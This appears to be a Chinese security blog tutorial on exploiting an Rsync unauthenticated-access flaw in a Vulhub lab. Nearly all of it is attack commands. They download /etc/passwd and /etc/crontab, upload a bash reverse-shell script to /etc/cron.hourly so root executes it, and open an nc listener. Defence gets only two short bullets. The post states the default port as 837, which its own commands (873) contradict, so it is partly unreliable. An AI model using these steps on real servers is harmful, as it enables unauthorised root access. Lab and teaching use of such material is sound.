Rsync未授权访问漏洞(rsync未授权访问利用)

漏洞简介

Rsync(Remote Sync)是一个用于文件和目录同步的开源工具,广泛用于Linux和Unix系统中,它通过比较源文件和目标文件的差异只传输变化的部分,实现高效的增量备份和文件同步,Rsync默认允许匿名访问,如果在配置文件中没有相关的用户认证以及文件授权就会触发隐患,Rsync的默认端口为837

环境搭建

这里我们使用Vulhub来构建环境

docker-compose up -d

漏洞检测

    #命令格式rsync rsync://{target_ip}/
    #执行示例rsync rsync://192.168.204.191:873/rsync rsync://192.168.204.191:873/src

    Rsync未授权访问漏洞(rsync未授权访问利用)

    文件下载

    任意文件下载

    rsync rsync://192.168.204.191:873/src/etc/passwd ./

    Rsync未授权访问漏洞(rsync未授权访问利用)

    反弹Shell

    通过使用rsync反弹shell

    # 下载crontab配置文件rsync rsync://192.168.204.191:873/src/etc/crontab ./

    该环境crontab中的以下内容表示每小时的第17分钟执行run-parts --report /etc/cron.hourly17 * * * * root cd / && run-parts --report /etc/cron.hourly

    Rsync未授权访问漏洞(rsync未授权访问利用)

    随后我们写入bash并赋权:

    #!/bin/bash/bin/bash -i >& /dev/tcp/192.168.204.135/4444 0>&1

    Rsync未授权访问漏洞(rsync未授权访问利用)

    chmod 777

    Rsync未授权访问漏洞(rsync未授权访问利用)

    随后我们将文件上传至/etc/cron.hourly

    rsync -av nc rsync://192.168.204.191:873/src/etc/cron.hourly

    Rsync未授权访问漏洞(rsync未授权访问利用)

    # 本地监听4444nc -lnvp 4444

    反弹成功:

    防御手段 

    • 数据加密传输等

    • 访问控制:控制接入源IP

    原创文章,作者:七芒星实验室,如若转载,请注明出处:https://www.sudun.com/ask/34234.html

    (0)
    七芒星实验室的头像七芒星实验室
    上一篇 2024年4月20日
    下一篇 2024年4月20日

    相关推荐

    发表回复

    您的电子邮箱地址不会被公开。 必填项已用 * 标注